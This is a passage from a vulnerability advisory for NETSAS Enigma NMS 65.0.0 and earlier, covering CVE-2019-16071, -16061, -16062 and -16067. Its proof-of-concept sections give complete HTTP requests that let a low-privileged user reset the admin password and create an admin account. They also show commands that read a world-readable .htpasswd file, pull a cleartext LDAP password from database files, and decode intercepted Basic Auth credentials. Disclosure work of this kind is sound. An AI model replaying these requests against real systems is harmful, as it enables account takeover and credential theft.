name=\"name_to_delete\"\x0d\x0a\x0d\x0amanage_logs.cgi_admin_temp.txt\x0d\x0a-----------------------------9188732181395748786103185051--\x0d\x0a' \ $'http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_files.cgi' |
#-------------------------------------------------------
# 07. Improper Authorisation Allowing Privileged Access
# CVE-ID: CVE-2019-16071
# CWE-ID: CWE-285: Improper Authorization
#-------------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
Enigma NMS allows administrative users to create low privileged accounts which do not have the ability to modify any settings in the system, only view the components. However, it is possible for a low privileged user to perform all actions as an administrator by bypassing authorisation controls and sending requests to the server in the context of an administrator.
====================
Exploit difficulty
====================
It is possible for any low privileged user logged on to the Enigma NMS system to perform any actions as an administrator, including the creation of an administrative account, deletion (retiring) of any account, change passwords for all accounts, as well as any other system functions an administrator is able to perform.
====================
Vulnerability Prevention
====================
For further information on web authentication, session management, and access control, refer to the following cheat sheet from OWASP: HERE
====================
Proof of Concept
====================
# POC 1:
The following POST request can be submitted by a low privileged user to change the password of the System Admin account to ‘password‘:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST /cgi-bin/protected/manage_person.cgi HTTP/1.1 Host: 192.168.7.240 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.7.240/cgi-bin/protected/manage_person.cgi?action=modify_person_verify&per_id=59&per_cst_id=2&per_wg_id=1&per_auth_req=N&per_fin_auth=N&per_ccm=N&per_rest_api=N&per_web_user=Y&per_shared_account=N&per_uid=lowpriv&per_fname=low&per_sname=priv&per_title=&per_pos=&per_comment=&per_ph=&per_mob=&per_fax=&per_email=&per_pager=&per_site_id=2&per_son_recipient=N&per_escalation_level=N%2FA&per_menu_style=1&per_enable_floating_menu=D Content-Type: application/x-www-form-urlencoded Content-Length: 431 Authorization: Basic bG93cHJpdjpwYXNzd29yZA== Connection: close Upgrade-Insecure-Requests: 1 action=modify_person_complete&per_id=39&per_fname=system&per_sname=admin&per_title=&per_pos=&per_comment=&per_cst_id=2&per_uid=admin&per_ph=&per_mob=&per_fax=&per_email=&per_pager=&per_wg_id=1&per_site_id=2&per_auth_req=N&per_fin_auth=N&per_web_user=Y&per_son_recipient=N&per_escalation_level=N%2FA&per_shared_account=N&per_ccm=N&per_rest_api=N&per_menu_style=1&per_enable_floating_menu=D&password=password&password_check=password |
# POC 2:
The following POST request can be submitted by a low privileged user to create a new user named ‘baduser‘ with a password of ‘password‘ and granted administrative privileges:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST /cgi-bin/protected/manage_person.cgi HTTP/1.1 Host: 192.168.7.240 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.7.240/cgi-bin/protected/manage_person.cgi?action=add_person_proceed&per_fname=bad&per_sname=user&per_title=&per_pos=&per_comment=&per_cst_id=2&per_uid=baduser&per_ph=&per_mob=&per_fax=&per_email=&per_pager=&per_wg_id=3&per_site_id=1&per_auth_req=Y&per_fin_auth=Y&per_web_user=Y&per_son_recipient=Y&per_shared_account=N&per_escalation_level=N%2FA&per_menu_style=1&per_enable_floating_menu=D Content-Type: application/x-www-form-urlencoded Content-Length: 415 Authorization: Basic bG93cHJpdjpwYXNzd29yZA== Connection: close Upgrade-Insecure-Requests: 1 action=add_person_complete&per_fname=bad&per_sname=user&per_title=&per_pos=&per_comment=&per_cst_id=2&per_uid=baduser&per_ph=&per_mob=&per_fax=&per_email=&per_pager=&per_wg_id=3&per_site_id=1&per_auth_req=Y&per_fin_auth=Y&per_web_user=Y&per_son_recipient=Y&per_escalation_level=N%2FA&per_shared_account=N&per_ccm=N&per_rest_api=N&per_menu_style=1&per_enable_floating_menu=D&password=password&password_check=password |
#------------------------------------------------
# 08. Incorrect Default Permissions
# CVE-ID: CVE-2019-16061
# CWE-ID: CWE-276: Incorrect Default Permissions
#------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
A number of files on the Enigma NMS server are granted weak world-readable and world-writeable permissions, allowing any low privileged user with access to the system to read sensitive data and create/modify/delete content within the operating system.
The following directory has been granted full read/write/execute permissions: /var/www/html/docs/
The following sensitive file used by the web service to store username and password combinations for the Enigma NMS application allows full read access by all users on the system: /etc/httpd/etc/.htpasswd
====================
Exploit difficulty
====================
It is possible for any user logged on to the Enigma NMS operating system to read the contents of the .htpasswd file due to world-readable permission assignment. It is also possible for any user logged in to the operating system, or logged onto the Enigma NMS web application to read/write/execute files stored in the /var/www/html/docs tree.
====================
Proof of Concept
====================
The following snippet shows a low privileged user being able to obtain username and password hashes for user configured in Enigma NMS:
|
1 2 3 4 |
$ cat /etc/httpd/etc/.htpasswd admin:pVjR8rECLd1L. pdf_export_user:YFbi55Mf/OYVw lowpriv:yRCsyWfCPp/cU |
#-------------------------------------------------------
# 09. Missing Encryption of Sensitive Data
# CVE-ID: CVE-2019-16062
# CWE-ID: CWE-311: Missing Encryption of Sensitive Data
#-------------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
NETSAS Pty Ltd’s Enigma NMS does not encyrpt sensitive data stored within the SQL database or sensitive data rendered within web pages in the Enigma NMS application. It is possible for an attacker with access to the file system or the Enigma NMS application to expose unencrypted sensitive data.
====================
Exploit difficulty
====================
An attacker with low privileged access to the operating system or the Enigma NMS web application to access unencrypted information such as passwords.
====================
Vulnerability Prevention
====================
For further information on data encryption, refer to the cryptographic storage cheat sheet from OWASP HERE
====================
Proof of Concept
====================
# POC 1:
The following snippet shows a low privileged user extracting the configured LDAP user account password of ‘supersecretpassword‘ from the ‘system_setting‘ database:
|
1 2 3 4 5 6 7 8 9 10 11 |
$> strings system_setting.MYD > data.txt ---snip--- ldap account name test_administrator Biding Account Name for ENIGMA NMS on LDAP Server ldap password supersecretpassword Password for Biding Account Name for ENIGMA NMS on LDAP Server ---snip--- |
# POC 2:
It is possible to view the source code of web pages in order to reveal clear text passwords. The following snippet shows the LDAP connection password being exposed by viewing the source code of the system LDAP configuration rendered page:
|
1 |
<input type="password" name="ldap_password" size="100" maxlength="255" value="supersecretpassword"> |
#-------------------------------------------------
# 10. Basic Authentication over HTTP
# CVE-ID: CVE-2019-16067
#-------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
NETSAS Pty Ltd’s Enigma NMS utilises basic authentication over HTTP for enforcing access control to the web application. The use of weak authentication transmitted over clear text protocols can allow an attacker to steal username and password combinations by intercepting authentication traffic in transit.
====================
Exploit difficulty
====================
An attacker needs to be located on the same network as the victim, or have the ability to perform a man-in-the-middle based attack in order to steal the basic authentication credentials.
====================
Vulnerability Prevention
====================
For further information on authentication controls, refer to the authentication cheat sheet from OWASP HERE
====================
Proof of Concept
====================
The following snippet shows the interception of a search request in the Enigma NMS application:
|
1 2 3 4 5 6 7 8 9 10 |
GET /cgi-bin/protected/manage_reason.cgi?action=search_reason_complete HTTP/1.1 Host: 192.168.7.240 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.7.240/cgi-bin/protected/list_mgt_utils.cgi Authorization: Basic YWRtaW46cGFzc3dvcmQ= Connection: close Upgrade-Insecure-Requests: 1 |
As the username and password is base64 encoding, it is trivial for the attacker to decode the information, as shown in the following snippet:
|
1 2 3 |
> echo -n "YWRtaW46cGFzc3dvcmQ=" | base64 -d admin:password > |